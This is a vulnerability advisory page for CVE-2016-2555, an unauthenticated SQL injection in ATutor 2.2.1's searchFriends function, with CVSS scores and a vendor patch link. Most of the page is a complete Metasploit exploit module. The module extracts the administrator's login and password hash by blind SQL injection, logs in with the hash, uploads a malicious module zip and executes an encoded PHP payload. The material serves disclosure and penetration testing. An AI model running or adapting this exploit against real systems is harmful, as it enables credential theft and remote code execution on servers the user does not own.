Lucene search

Steven Seeley of Source InciteSRC-2016-0007

HistoryFeb 24, 2016 - 12:00 a.m.

SRC-2016-0007 : ATutor LMS searchFriends SQL Injection Remote Code Execution Vulnerability

2016-02-2400:00:00

Steven Seeley of Source Incite

srcincite.io

CVSS2

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

CVSS3

9.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

AI Score

8.3

Confidence

Low

EPSS

0.819

Percentile

98.4%

JSON

Vulnerability Details:

This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of ATutor. Authentication is not required to exploit this vulnerability.

The specific flaw exists in the searchFriends() function within the ‘friends.inc.php’ script. An attacker can steal the administrators hashed password. The hashed password can be used to login to the target without password cracking due to a second weakness in the authentication mechanism. Finally, an attacker can use these combined vulnerabilities to upload and execute arbitrary php code.

Affected Vendors:

ATutor

Affected Products:

ATutor 2.2.1 is confirmed, other versions may also be affected.

Vendor Response:

ATutor has issued an update to correct this vulnerability. More details can be found at: <https://github.com/atutor/ATutor/commit/629b2c992447f7670a2fecc484abfad8c4c2d298>

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::FileDropper

  def initialize(info={})
    super(update_info(info,
      'Name'           => 'ATutor 2.2.1 SQL Injection / Remote Code Execution',
      'Description'    => %q{
         This module exploits a SQL Injection vulnerability and an authentication weakness
         vulnerability in ATutor. This essentially means an attacker can bypass authentication
         and reach the administrator's interface where they can upload malicious code.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'mr_me', # initial discovery, msf code
        ],
      'References'     =>
        [
          [ 'CVE', '2016-2555'  ],
          [ 'URL', 'http://www.atutor.ca/' ],                        # Official Website
          [ 'URL', 'http://sourceincite.com/research/src-2016-08/' ] # Advisory
        ],
      'Privileged'     => false,
      'Payload'        =>
        {
          'DisableNops' => true,
        },
      'Platform'       => ['php'],
      'Arch'           => ARCH_PHP,
      'Targets'        => [[ 'Automatic', { }]],
      'DisclosureDate' => '2016-03-01',
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The path of Atutor', '/ATutor/'])
      ])
  end

  def print_status(msg='')
    super("#{peer} - #{msg}")
  end

  def print_error(msg='')
    super("#{peer} - #{msg}")
  end

  def print_good(msg='')
    super("#{peer} - #{msg}")
  end

  def check
    # the only way to test if the target is vuln
    if test_injection
      return Exploit::CheckCode::Vulnerable
    else
      return Exploit::CheckCode::Safe
    end
  end

  def create_zip_file
    zip_file      = Rex::Zip::Archive.new
    @header       = Rex::Text.rand_text_alpha_upper(4)
    @payload_name = Rex::Text.rand_text_alpha_lower(4)
    @plugin_name  = Rex::Text.rand_text_alpha_lower(3)

    path = "#{@plugin_name}/#{@payload_name}.php"
    # this content path is where the ATutor authors recommended installing it
    register_file_for_cleanup("#{@payload_name}.php", "/var/content/module/#{path}")
    zip_file.add_file(path, "")
    zip_file.pack
  end

  def exec_code
    send_request_cgi({
      'method'   => 'GET',
      'uri'      => normalize_uri(target_uri.path, "mods", @plugin_name, "#{@payload_name}.php"),
      'raw_headers' => "#{@header}: #{Rex::Text.encode_base64(payload.encoded)}\r\n"
    }, 0.1)
  end

  def upload_shell(cookie)
    post_data = Rex::MIME::Message.new
    post_data.add_part(create_zip_file, 'archive/zip', nil, "form-data; name=\"modulefile\"; filename=\"#{@plugin_name}.zip\"")
    post_data.add_part("#{Rex::Text.rand_text_alpha_upper(4)}", nil, nil, "form-data; name=\"install_upload\"")
    data = post_data.to_s
    res = send_request_cgi({
      'uri' => normalize_uri(target_uri.path, "mods", "_core", "modules", "install_modules.php"),
      'method' => 'POST',
      'data' => data,
      'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
      'cookie' => cookie
    })

    if res && res.code == 302 && res.redirection.to_s.include?("module_install_step_1.php?mod=#{@plugin_name}")
       res = send_request_cgi({
         'method' => 'GET',
         'uri'    => normalize_uri(target_uri.path, "mods", "_core", "modules", res.redirection),
         'cookie' => cookie
       })
       if res && res.code == 302 && res.redirection.to_s.include?("module_install_step_2.php?mod=#{@plugin_name}")
          res = send_request_cgi({
            'method' => 'GET',
            'uri'    => normalize_uri(target_uri.path, "mods", "_core", "modules", "module_install_step_2.php?mod=#{@plugin_name}"),
            'cookie' => cookie
          })
       return true
       end
    end
    # unknown failure...
    fail_with(Failure::Unknown, "Unable to upload php code")
    return false
  end

  def login(username, hash)
    password = Rex::Text.sha1(hash)
    res = send_request_cgi({
      'method'   => 'POST',
      'uri'      => normalize_uri(target_uri.path, "login.php"),
      'vars_post' => {
        'form_password_hidden' => password,
        'form_login' => username,
        'submit' => 'Login',
        'token' => ''
      },
    })
    # poor developer practices
    cookie = "ATutorID=#{$4};" if res.get_cookies =~ /ATutorID=(.*); ATutorID=(.*); ATutorID=(.*); ATutorID=(.*);/
    if res && res.code == 302 && res.redirection.to_s.include?('admin/index.php')
      # if we made it here, we are admin
      store_valid_credential(user: username, private: hash, private_type: :nonreplayable_hash)
      return cookie
    end
    # auth failed if we land here, bail
    fail_with(Failure::NoAccess, "Authentication failed with username #{username}")
    return nil
  end

  def perform_request(sqli)
    # the search requires a minimum of 3 chars
    sqli = "#{Rex::Text.rand_text_alpha(3)}'/**/or/**/#{sqli}/**/or/**/1='"
    rand_key = Rex::Text.rand_text_alpha(1)
    res = send_request_cgi({
      'method'   => 'POST',
      'uri'      => normalize_uri(target_uri.path, "mods", "_standard", "social", "index_public.php"),
      'vars_post' => {
        "search_friends_#{rand_key}" => sqli,
        'rand_key' => rand_key,
        'search' => 'Search'
      },
    })
    res ? res.body : ''
  end

   def dump_the_hash
    extracted_hash = ""
    sqli = "(select/**/length(concat(login,0x3a,password))/**/from/**/AT_admins/**/limit/**/0,1)"
    login_and_hash_length = generate_sql_and_test(do_true=false, do_test=false, sql=sqli).to_i
    for i in 1..login_and_hash_length
       sqli = "ascii(substring((select/**/concat(login,0x3a,password)/**/from/**/AT_admins/**/limit/**/0,1),#{i},1))"
       asciival = generate_sql_and_test(false, false, sqli)
       if asciival >= 0
          extracted_hash << asciival.chr
       end
    end
    return extracted_hash.split(":")
  end

  # greetz to rsauron & the darkc0de crew!
  def get_ascii_value(sql)
    lower = 0
    upper = 126
    while lower < upper
       mid = (lower + upper) / 2
       sqli = "#{sql}>#{mid}"
       result = perform_request(sqli)
       if result =~ /There are \d+ entries\./
        lower = mid + 1
       else
        upper = mid
       end
    end
    if lower > 0 and lower < 126
       value = lower
    else
       sqli = "#{sql}=#{lower}"
       result = perform_request(sqli)
       if result =~ /There are \d+ entries\./
          value = lower
       end
    end
    return value
  end

  def generate_sql_and_test(do_true=false, do_test=false, sql=nil)
    if do_test
      if do_true
        result = perform_request("1=1")
        if result =~ /There are \d+ entries\./
          return true
        end
      else not do_true
        result = perform_request("1=2")
        if not result =~ /There are \d+ entries\./
          return true
        end
      end
    elsif not do_test and sql
      return get_ascii_value(sql)
    end
  end

  def test_injection
    if generate_sql_and_test(do_true=true, do_test=true, sql=nil)
       if generate_sql_and_test(do_true=false, do_test=true, sql=nil)
        return true
       end
    end
    return false
  end

  def service_details
    super.merge({ post_reference_name: self.refname, jtr_format: 'sha512' })
  end

  def exploit
    print_status("Dumping the username and password hash...")
    credz = dump_the_hash
    if credz.nil? || credz.empty?
      fail_with(Failure::NotVulnerable, 'Failed to retrieve username and password hash')
    end
    print_good("Got the #{credz[0]}'s hash: #{credz[1]} !")
    admin_cookie = login(credz[0], credz[1])
    if upload_shell(admin_cookie)
      exec_code
    end
  end
end